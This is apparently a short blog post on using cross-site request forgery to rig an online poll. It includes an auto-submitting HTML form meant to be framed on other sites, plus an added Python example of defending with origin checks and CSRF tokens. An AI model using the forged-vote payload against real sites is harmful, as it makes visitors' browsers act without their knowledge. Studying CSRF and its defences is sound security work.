I love CSRF (XSRF)
I really do love CSRF… and it all started back when I was reading a topic on the w4ck1ng forum; don't remember the link, but gonna tell you in a few words. There was this guy who wanted to know if there could be a way to win a poll without constantly changing proxies. The first thing that came to my mind was CSRF. Why do the dirty job and manually vote 24/7 so that you can win, when you can create an HTML page which contains the form with auto-submit and incorporate it in an iframe on a website?
How does the HTML of such a poll look?
—
<html>
<body onload="document.poll.submit()">
<form name="poll" action="website.dom/pollvote.php" method="post">
<input type="hidden" value="3"> <!-- the poll option -->
</form>
</body>
</html>
—
This is just an example; for more CSRF fun check the CSRF Database.
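
The defender's side of the same poll, as an added example that is not part of the original post: a vote handler that rejects the auto-submitted form above because it carries neither the site's own Origin nor a per-session token. The `https://website.dom` origin, the `option` and `csrf_token` field names, the session id and the request model are all assumptions made for this sketch.

```python
import hashlib
import hmac
import secrets

# Assumed values for this sketch; none of them come from the original post.
SITE_ORIGIN = "https://website.dom"
SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret, kept server-side


def issue_token(session_id: str) -> str:
    """Token the site embeds as a hidden field when it renders its own poll form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_vote(method, headers, form, session_id):
    """Return (status, reason) for a request to the poll endpoint."""
    if method != "POST":
        return 405, "votes must be POSTed"
    # Browsers attach Origin to cross-site form POSTs; a page framed on
    # another site cannot make it equal the poll's own origin.
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request"
    # The session cookie rides along with a forged request automatically,
    # but the token does not: the other site cannot read it from our page.
    sent = form.get("csrf_token", "").encode()
    expected = issue_token(session_id).encode()
    if not session_id or not hmac.compare_digest(sent, expected):
        return 403, "missing or invalid CSRF token"
    if form.get("option") not in {"1", "2", "3"}:
        return 400, "unknown poll option"
    return 200, "vote recorded"


# Constructed sample requests.
SESSION = "constructed-session-id"
FORGED = {"option": "3"}  # all the auto-submitting form can send
GENUINE = {"option": "3", "csrf_token": issue_token(SESSION)}


def demo():
    return [
        handle_vote("POST", {"Origin": "https://other.example"}, FORGED, SESSION),
        handle_vote("POST", {}, FORGED, SESSION),  # Origin absent: token still fails
        handle_vote("POST", {"Origin": SITE_ORIGIN}, GENUINE, SESSION),
    ]


if __name__ == "__main__":
    for status, reason in demo():
        print(status, reason)
```

The token check is the primary control here; the Origin comparison is a second layer that is skipped when the header is absent.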





I was wondering if you would
like to do a presentation
on either CSRF or a topic
of your choice at the upcoming
online darkstar presentation.
drop me an email or something.
peace,
fazed
[...] 7, 2008 Some time ago when I posted I Love CSRF (XSRF) fazed invited me to do a presentation on CSRF attack and protection… but since then [...]